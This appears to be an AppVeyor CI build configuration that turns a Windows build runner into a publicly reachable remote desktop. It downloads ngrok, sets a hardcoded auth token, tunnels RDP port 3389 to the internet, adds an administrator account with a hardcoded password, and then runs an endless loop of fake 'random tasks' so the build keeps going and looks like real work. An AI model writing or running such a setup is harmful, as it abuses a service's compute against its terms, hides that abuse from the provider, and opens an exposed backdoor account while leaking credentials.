version: 1.0.{build}
image: Visual Studio 2022

# Define the steps directly in the "build_script" section
build_script:
  # Step 1: Download Ngrok
  - ps: |
      Invoke-WebRequest https://bin.equinox.io/c/bNyj1mQVY4c/ngrok-v3-stable-windows-amd64.zip -OutFile ngrok.zip
      Expand-Archive -Path ngrok.zip -DestinationPath .\ngrok

  # Step 2: Set up the Ngrok Token
  - ps: |
      .\ngrok\ngrok.exe authtoken 28JYgftH5GZ3fQ7n261rSg02sVp_7FwDqjxuoagKqFTZo7MMd
      Start-Process PowerShell -ArgumentList '-Noexit -Command ".\ngrok\ngrok.exe tcp 3389"'

  # Step 3: Enable RDP Access
  - ps: |
      Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -name "fDenyTSConnections" -Value 0
      Enable-NetFirewallRule -DisplayGroup "Remote Desktop"
      Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -name "UserAuthentication" -Value 1

  # Step 4: Create a new user "haidanh" with the password "H@i03052008"
  - ps: |
      net user haidanh H@i03052008 /add
      net localgroup administrators haidanh /add

  # Step 5: Fetch Ngrok Tunnels Information
  - ps: Invoke-WebRequest http://localhost:4040/api/tunnels

  # Step 6: Simulate random tasks like network checks, downloading, and file creation
  - ps: |
      $tasks = @(
        { Write-Host "Checking network connection..."; Test-Connection -ComputerName google.com -Count 2 },
        { Write-Host "Downloading random file..."; Invoke-WebRequest -Uri "https://example.com" -OutFile "randomFile.txt" },
        { Write-Host "Creating random file..."; $randomText = Get-Random -Minimum 1 -Maximum 100; Set-Content -Path "file_$randomText.txt" -Value "Random content $randomText" },
        { Write-Host "Sending a web request..."; Invoke-WebRequest -Uri "https://httpbin.org/get" },
        { Write-Host "Checking disk space..."; Get-PSDrive -Name C },
        { Write-Host "Simulating CPU load..."; $x = 1..5000000 | ForEach-Object {$_ * 2} }
      )

      while ($true) {
          $randomTask = Get-Random -InputObject $tasks
          & $randomTask
          Start-Sleep -Seconds 10
      }
